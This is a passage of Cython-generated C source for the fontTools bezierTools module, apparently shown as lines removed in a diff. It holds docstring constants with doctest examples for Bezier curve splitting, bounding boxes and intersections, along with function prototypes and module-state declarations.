__pyx_k_both_points_are_on_same_side_of[] = "_both_points_are_on_same_side_of_origin"; -static const char __pyx_k_calcQuadraticArcLength_line_151[] = "calcQuadraticArcLength (line 151)"; -static const char __pyx_k_curve_curve_intersections_t_loc[] = "_curve_curve_intersections_t..midpoint"; -static const char __pyx_k_curve_line_intersections_t_loca[] = "_curve_line_intersections_t..genexpr"; -static const char __pyx_k_lineLineIntersections_line_1147[] = "lineLineIntersections (line 1147)"; -static const char __pyx_k_Calculates_the_bounding_rectangl[] = "Calculates the bounding rectangle for a quadratic Bezier segment.\n\n Args:\n pt1: Start point of the Bezier as a 2D tuple.\n pt2: Handle point of the Bezier as a 2D tuple.\n pt3: End point of the Bezier as a 2D tuple.\n\n Returns:\n A four-item tuple representing the bounding rectangle ``(xMin, yMin, xMax, yMax)``.\n\n Example::\n\n >>> calcQuadraticBounds((0, 0), (50, 100), (100, 0))\n (0, 0, 100, 50.0)\n >>> calcQuadraticBounds((0, 0), (100, 0), (100, 100))\n (0.0, 0.0, 100, 100)\n "; -static const char __pyx_k_Couldn_t_work_out_which_intersec[] = "Couldn't work out which intersection function to use"; -static const char __pyx_k_Finds_intersections_between_a_cu[] = "Finds intersections between a curve and a line.\n\n Args:\n curve: List of coordinates of the curve segment as 2D tuples.\n line: List of coordinates of the line segment as 2D tuples.\n\n Returns:\n A list of ``Intersection`` objects, each object having ``pt``, ``t1``\n and ``t2`` attributes containing the intersection point, time on first\n segment and time on second segment respectively.\n\n Examples::\n >>> curve = [ (100, 240), (30, 60), (210, 230), (160, 30) ]\n >>> line = [ (25, 260), (230, 20) ]\n >>> intersections = curveLineIntersections(curve, line)\n >>> len(intersections)\n 3\n >>> intersections[0].pt\n (84.9000930760723, 189.87306176459828)\n "; -static const char __pyx_k_Lib_fontTools_misc_bezierTools_p[] = "Lib/fontTools/misc/bezierTools.py"; -static const char __pyx_k_Split_a_cubic_Bezier_curve_at_on[] = "Split a cubic Bezier curve at one or more values of t.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as 2D tuples.\n *ts: Positions at which to split the curve.\n\n Returns:\n A list of curve segments (each curve segment being four 2D tuples).\n\n Examples::\n\n >>> printSegments(splitCubicAtT((0, 0), (25, 100), (75, 100), (100, 0), 0.5))\n ((0, 0), (12.5, 50), (31.25, 75), (50, 75))\n ((50, 75), (68.75, 75), (87.5, 50), (100, 0))\n >>> printSegments(splitCubicAtT((0, 0), (25, 100), (75, 100), (100, 0), 0.5, 0.75))\n ((0, 0), (12.5, 50), (31.25, 75), (50, 75))\n ((50, 75), (59.375, 75), (68.75, 68.75), (77.3438, 56.25))\n ((77.3438, 56.25), (85.9375, 43.75), (93.75, 25), (100, 0))\n "; -static const char __pyx_k_Split_a_line_at_a_given_coordina[] = "Split a line at a given coordinate.\n\n Args:\n pt1: Start point of line as 2D tuple.\n pt2: End point of line as 2D tuple.\n where: Position at which to split the line.\n isHorizontal: Direction of the ray splitting the line. If true,\n ``where`` is interpreted as a Y coordinate; if false, then\n ``where`` is interpreted as an X coordinate.\n\n Returns:\n A list of two line segments (each line segment being two 2D tuples)\n if the line was successfully split, or a list containing the original\n line.\n\n Example::\n\n >>> printSegments(splitLine((0, 0), (100, 100), 50, True))\n ((0, 0), (50, 50))\n ((50, 50), (100, 100))\n >>> printSegments(splitLine((0, 0), (100, 100), 100, True))\n ((0, 0), (100, 100))\n >>> printSegments(splitLine((0, 0), (100, 100), 0, True))\n ((0, 0), (0, 0))\n ((0, 0), (100, 100))\n >>> printSegments(splitLine((0, 0), (100, 100), 0, False))\n ((0, 0), (0, 0))\n ((0, 0), (100, 100))\n >>> printSegments(splitLine((100, 0), (0, 0), 50, False))\n ((100, 0), (50, 0))\n ((50, 0), (0, 0))\n >>> printSegments(splitLine((0, 100), (0, 0), 50, True))\n ((0, 100), (0, 50))\n ((0, 50), (0, 0))\n "; -static const char __pyx_k_Split_a_quadratic_Bezier_curve_a[] = "Split a quadratic Bezier curve at a given coordinate.\n\n Args:\n pt1,pt2,pt3: Control points of the Bezier as 2D tuples.\n where: Position at which to split the curve.\n isHorizontal: Direction of the ray splitting the curve. If true,\n ``where`` is interpreted as a Y coordinate; if false, then\n ``where`` is interpreted as an X coordinate.\n\n Returns:\n A list of two curve segments (each curve segment being three 2D tuples)\n if the curve was successfully split, or a list containing the original\n curve.\n\n Example::\n\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 150, False))\n ((0, 0), (50, 100), (100, 0))\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 50, False))\n ((0, 0), (25, 50), (50, 50))\n ((50, 50), (75, 50), (100, 0))\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 25, False))\n ((0, 0), (12.5, 25), (25, 37.5))\n ((25, 37.5), (62.5, 75), (100, 0))\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 25, True))\n ((0, 0), (7.32233, 14.6447), (14.6447, 25))\n ((14.6447, 25), (50, 75), (85.3553, 25))\n ((85.3553, 25), (92.6777, 14.6447), (100, -7.10543e-15))\n >>> # XXX I'm not at all sure if the following behavior is desirable:\n >>> printSegments(splitQuadratic((0, 0), (50, 100), (100, 0), 50, True))\n ((0, 0), (25, 50), (50, 50))\n ((50, 50), (50, 50), (50, 50))\n ((50, 50), (75, 50), (100, 0))\n "; -static const char __pyx_k_approximateCubicArcLength_line_3[] = "approximateCubicArcLength (line 332)"; -static const char __pyx_k_curveCurveIntersections_line_137[] = "curveCurveIntersections (line 1373)"; -static const char __pyx_k_curveLineIntersections_line_1248[] = "curveLineIntersections (line 1248)"; -static const char __pyx_k_fontTools_misc_bezierTools_py_to[] = "fontTools.misc.bezierTools.py -- tools for working with Bezier path segments.\n"; -static const char __pyx_k_segmentSegmentIntersections_line[] = "segmentSegmentIntersections (line 1401)"; -static const char __pyx_k_Finds_intersections_between_two_2[] = "Finds intersections between two segments.\n\n Args:\n seg1: List of coordinates of the first segment as 2D tuples.\n seg2: List of coordinates of the second segment as 2D tuples.\n\n Returns:\n A list of ``Intersection`` objects, each object having ``pt``, ``t1``\n and ``t2`` attributes containing the intersection point, time on first\n segment and time on second segment respectively.\n\n Examples::\n >>> curve1 = [ (10,100), (90,30), (40,140), (220,220) ]\n >>> curve2 = [ (5,150), (180,20), (80,250), (210,190) ]\n >>> intersections = segmentSegmentIntersections(curve1, curve2)\n >>> len(intersections)\n 3\n >>> intersections[0].pt\n (81.7831487395506, 109.88904552375288)\n >>> curve3 = [ (100, 240), (30, 60), (210, 230), (160, 30) ]\n >>> line = [ (25, 260), (230, 20) ]\n >>> intersections = segmentSegmentIntersections(curve3, line)\n >>> len(intersections)\n 3\n >>> intersections[0].pt\n (84.9000930760723, 189.87306176459828)\n\n "; -static const char __pyx_k_curve_curve_intersections_t_loc_2[] = "_curve_curve_intersections_t.."; -static const char __pyx_k_Calculates_the_bounding_rectangl_2[] = "Calculates the bounding rectangle for a quadratic Bezier segment.\n\n Args:\n pt1,pt2,pt3,pt4: Control points of the Bezier as 2D tuples.\n\n Returns:\n A four-item tuple representing the bounding rectangle ``(xMin, yMin, xMax, yMax)``.\n\n Example::\n\n >>> calcCubicBounds((0, 0), (25, 100), (75, 100), (100, 0))\n (0, 0, 100, 75.0)\n >>> calcCubicBounds((0, 0), (50, 0), (100, 50), (100, 100))\n (0.0, 0.0, 100, 100)\n >>> print(\"%f %f %f %f\" % calcCubicBounds((50, 0), (0, 100), (100, 100), (50, 0)))\n 35.566243 0.000000 64.433757 75.000000\n "; -static const char __pyx_k_Finds_intersections_between_a_cu_2[] = "Finds intersections between a curve and a curve.\n\n Args:\n curve1: List of coordinates of the first curve segment as 2D tuples.\n curve2: List of coordinates of the second curve segment as 2D tuples.\n\n Returns:\n A list of ``Intersection`` objects, each object having ``pt``, ``t1``\n and ``t2`` attributes containing the intersection point, time on first\n segment and time on second segment respectively.\n\n Examples::\n >>> curve1 = [ (10,100), (90,30), (40,140), (220,220) ]\n >>> curve2 = [ (5,150), (180,20), (80,250), (210,190) ]\n >>> intersections = curveCurveIntersections(curve1, curve2)\n >>> len(intersections)\n 3\n >>> intersections[0].pt\n (81.7831487395506, 109.88904552375288)\n "; -static const char __pyx_k_Split_a_quadratic_Bezier_curve_a_2[] = "Split a quadratic Bezier curve at one or more values of t.\n\n Args:\n pt1,pt2,pt3: Control points of the Bezier as 2D tuples.\n *ts: Positions at which to split the curve.\n\n Returns:\n A list of curve segments (each curve segment being three 2D tuples).\n\n Examples::\n\n >>> printSegments(splitQuadraticAtT((0, 0), (50, 100), (100, 0), 0.5))\n ((0, 0), (25, 50), (50, 50))\n ((50, 50), (75, 50), (100, 0))\n >>> printSegments(splitQuadraticAtT((0, 0), (50, 100), (100, 0), 0.5, 0.75))\n ((0, 0), (25, 50), (50, 50))\n ((50, 50), (62.5, 50), (75, 37.5))\n ((75, 37.5), (87.5, 25), (100, 0))\n "; -/* #### Code section: decls ### */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_calcCubicArcLength(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4, PyObject *__pyx_v_tolerance); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_2_split_cubic_into_two(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_p0, PyObject *__pyx_v_p1, PyObject *__pyx_v_p2, PyObject *__pyx_v_p3); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_4_calcCubicArcLengthCRecurse(CYTHON_UNUSED PyObject *__pyx_self, double __pyx_v_mult, __pyx_t_double_complex __pyx_v_p0, __pyx_t_double_complex __pyx_v_p1, __pyx_t_double_complex __pyx_v_p2, __pyx_t_double_complex __pyx_v_p3); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_6calcCubicArcLengthC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4, double __pyx_v_tolerance); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_8calcQuadraticArcLength(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_10calcQuadraticArcLengthC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_12approximateQuadraticArcLength(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_14approximateQuadraticArcLengthC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_16calcQuadraticBounds(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_18approximateCubicArcLength(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_20approximateCubicArcLengthC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_22calcCubicBounds(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_24splitLine(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_where, PyObject *__pyx_v_isHorizontal); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_14splitQuadratic_genexpr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_26splitQuadratic(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_where, PyObject *__pyx_v_isHorizontal); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_10splitCubic_genexpr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_28splitCubic(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4, PyObject *__pyx_v_where, PyObject *__pyx_v_isHorizontal); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_30splitQuadraticAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_ts); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_32splitCubicAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4, PyObject *__pyx_v_ts); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_34splitCubicAtTC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4, PyObject *__pyx_v_ts); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_37splitCubicIntoTwoAtTC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4, double __pyx_v_t); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_39_splitQuadraticAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_ts); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_41_splitCubicAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d, PyObject *__pyx_v_ts); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_43_splitCubicAtTC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_a, __pyx_t_double_complex __pyx_v_b, __pyx_t_double_complex __pyx_v_c, __pyx_t_double_complex __pyx_v_d, PyObject *__pyx_v_ts); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_94__defaults__(CYTHON_UNUSED PyObject *__pyx_self); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_46solveQuadratic(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_sqrt); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_48solveCubic(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_50calcQuadraticParameters(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_52calcCubicParameters(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_54calcQuadraticPoints(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_56calcCubicPoints(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_58linePointAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_t); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_60quadraticPointAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_t); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_62cubicPointAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_pt1, PyObject *__pyx_v_pt2, PyObject *__pyx_v_pt3, PyObject *__pyx_v_pt4, PyObject *__pyx_v_t); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_64cubicPointAtTC(CYTHON_UNUSED PyObject *__pyx_self, __pyx_t_double_complex __pyx_v_pt1, __pyx_t_double_complex __pyx_v_pt2, __pyx_t_double_complex __pyx_v_pt3, __pyx_t_double_complex __pyx_v_pt4, double __pyx_v_t); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_66segmentPointAtT(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_seg, PyObject *__pyx_v_t); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_68_line_t_of_pt(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_s, PyObject *__pyx_v_e, PyObject *__pyx_v_pt); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_70_both_points_are_on_same_side_of_origin(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_origin); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_72lineLineIntersections(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_s1, PyObject *__pyx_v_e1, PyObject *__pyx_v_s2, PyObject *__pyx_v_e2); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_74_alignment_transformation(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_segment); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_27_curve_line_intersections_t_genexpr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_76_curve_line_intersections_t(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_curve, PyObject *__pyx_v_line); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_78curveLineIntersections(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_curve, PyObject *__pyx_v_line); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_80_curve_bounds(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_c); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_82_split_segment_at_t(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_c, PyObject *__pyx_v_t); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_28_curve_curve_intersections_t_midpoint(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_r); /* proto */ -static PyObject *__pyx_lambda_funcdef_lambda3(PyObject *__pyx_self, PyObject *__pyx_v_ts); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_84_curve_curve_intersections_t(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_curve1, PyObject *__pyx_v_curve2, PyObject *__pyx_v_precision, PyObject *__pyx_v_range1, PyObject *__pyx_v_range2); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_86curveCurveIntersections(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_curve1, PyObject *__pyx_v_curve2); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_88segmentSegmentIntersections(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_seg1, PyObject *__pyx_v_seg2); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_12_segmentrepr_genexpr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_genexpr_arg_0); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_90_segmentrepr(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_obj); /* proto */ -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_92printSegments(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_segments); /* proto */ -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ -static PyObject *__pyx_tp_new_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr(PyTypeObject *t, PyObject *a, PyObject *k); /*proto*/ -/* #### Code section: late_includes ### */ -/* #### Code section: module_state ### */ -typedef struct { - PyObject *__pyx_d; - PyObject *__pyx_b; - PyObject *__pyx_cython_runtime; - PyObject *__pyx_empty_tuple; - PyObject *__pyx_empty_bytes; - PyObject *__pyx_empty_unicode; - #ifdef __Pyx_CyFunction_USED - PyTypeObject *__pyx_CyFunctionType; - #endif - #ifdef __Pyx_FusedFunction_USED - PyTypeObject *__pyx_FusedFunctionType; - #endif - #ifdef __Pyx_Generator_USED - PyTypeObject *__pyx_GeneratorType; - #endif - #ifdef __Pyx_IterableCoroutine_USED - PyTypeObject *__pyx_IterableCoroutineType; - #endif - #ifdef __Pyx_Coroutine_USED - PyTypeObject *__pyx_CoroutineAwaitType; - #endif - #ifdef __Pyx_Coroutine_USED - PyTypeObject *__pyx_CoroutineType; - #endif - #if CYTHON_USE_MODULE_STATE - #endif - #if CYTHON_USE_MODULE_STATE - PyObject *__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr; - PyObject *__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr; - PyObject *__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC; - PyObject *__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC; - PyObject *__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr; - PyObject *__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t; - PyObject *__pyx_type_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr; - #endif - PyTypeObject *__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct__genexpr; - PyTypeObject *__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_1_genexpr; - PyTypeObject *__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_2_splitCubicAtTC; - PyTypeObject *__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_3__splitCubicAtTC; - PyTypeObject *__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_4_genexpr; - PyTypeObject *__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_5__curve_curve_intersections_t; - PyTypeObject *__pyx_ptype_9fontTools_4misc_11bezierTools___pyx_scope_struct_6_genexpr; - PyObject *__pyx_n_s_1_t; - PyObject *__pyx_n_s_1_t_2; - PyObject *__pyx_n_s_2_t_1_t; - PyObject *__pyx_kp_u_Approximates_the_arc_length_for; - PyObject *__pyx_n_s_AttributeError; - PyObject *__pyx_n_s_COMPILED; - PyObject *__pyx_kp_u_Calculates_the_arc_length_for_a; - PyObject *__pyx_kp_u_Calculates_the_bounding_rectangl; - PyObject *__pyx_kp_u_Calculates_the_bounding_rectangl_2; - PyObject *__pyx_kp_u_Couldn_t_work_out_which_intersec; - PyObject *__pyx_n_s_DD; - PyObject *__pyx_kp_u_Finds_intersections_between_a_cu; - PyObject *__pyx_kp_u_Finds_intersections_between_a_cu_2; - PyObject *__pyx_kp_u_Finds_intersections_between_two; - PyObject *__pyx_kp_u_Finds_intersections_between_two_2; - PyObject *__pyx_n_s_Identity; - PyObject *__pyx_n_s_ImportError; - PyObject *__pyx_n_s_Intersection; - PyObject *__pyx_n_u_Intersection; - PyObject *__pyx_n_s_Len; - PyObject *__pyx_kp_s_Lib_fontTools_misc_bezierTools_p; - PyObject *__pyx_n_s_Q; - PyObject *__pyx_n_s_Q3; - PyObject *__pyx_n_s_R; - PyObject *__pyx_n_s_R2; - PyObject *__pyx_n_s_R2_Q3; - PyObject *__pyx_kp_u_Solve_a_cubic_equation_Solves_a; - PyObject *__pyx_kp_u_Split_a_cubic_Bezier_curve_at_a; - PyObject *__pyx_kp_u_Split_a_cubic_Bezier_curve_at_on; - PyObject *__pyx_kp_u_Split_a_line_at_a_given_coordina; - PyObject *__pyx_kp_u_Split_a_quadratic_Bezier_curve_a; - PyObject *__pyx_kp_u_Split_a_quadratic_Bezier_curve_a_2; - PyObject *__pyx_n_s_TypeError; - PyObject *__pyx_kp_u_Unknown_curve_degree; - PyObject *__pyx_n_s_ValueError; - PyObject *__pyx_kp_u__10; - PyObject *__pyx_n_s__103; - PyObject *__pyx_n_s__11; - PyObject *__pyx_kp_u__9; - PyObject *__pyx_n_s__91; - PyObject *__pyx_n_s_a; - PyObject *__pyx_n_s_a1; - PyObject *__pyx_n_s_a1_3; - PyObject *__pyx_n_s_a1x; - PyObject *__pyx_n_s_a1y; - PyObject *__pyx_n_s_a2; - PyObject *__pyx_n_s_a3; - PyObject *__pyx_n_s_acos; - PyObject *__pyx_n_s_aligned_curve; - PyObject *__pyx_n_s_alignment_transformation; - PyObject *__pyx_n_s_all; - PyObject *__pyx_n_s_angle; - PyObject *__pyx_n_s_append; - PyObject *__pyx_n_s_approximateCubicArcLength; - PyObject *__pyx_n_u_approximateCubicArcLength; - PyObject *__pyx_n_s_approximateCubicArcLengthC; - PyObject *__pyx_n_u_approximateCubicArcLengthC; - PyObject *__pyx_kp_u_approximateCubicArcLength_line_3; - PyObject *__pyx_n_s_approximateQuadraticArcLength; - PyObject *__pyx_n_u_approximateQuadraticArcLength; - PyObject *__pyx_n_s_approximateQuadraticArcLengthC; - PyObject *__pyx_n_u_approximateQuadraticArcLengthC; - PyObject *__pyx_n_s_arch; - PyObject *__pyx_n_s_args; - PyObject *__pyx_n_s_asinh; - PyObject *__pyx_n_s_asyncio_coroutines; - PyObject *__pyx_n_s_atan2; - PyObject *__pyx_n_s_ax; - PyObject *__pyx_n_s_ax2; - PyObject *__pyx_n_s_ax3; - PyObject *__pyx_n_s_ay; - PyObject *__pyx_n_s_ay2; - PyObject *__pyx_n_s_ay3; - PyObject *__pyx_n_s_b; - PyObject *__pyx_n_s_b1; - PyObject *__pyx_n_s_b1x; - PyObject *__pyx_n_s_b1y; - PyObject *__pyx_n_s_both_points_are_on_same_side_of; - PyObject *__pyx_n_s_bounds1; - PyObject *__pyx_n_s_bounds2; - PyObject *__pyx_n_s_box; - PyObject *__pyx_n_s_bx; - PyObject *__pyx_n_s_bx2; - PyObject *__pyx_n_s_by; - PyObject *__pyx_n_s_by2; - PyObject *__pyx_n_s_c; - PyObject *__pyx_n_s_c1; - PyObject *__pyx_n_s_c11; - PyObject *__pyx_n_s_c11_range; - PyObject *__pyx_n_s_c12; - PyObject *__pyx_n_s_c12_range; - PyObject 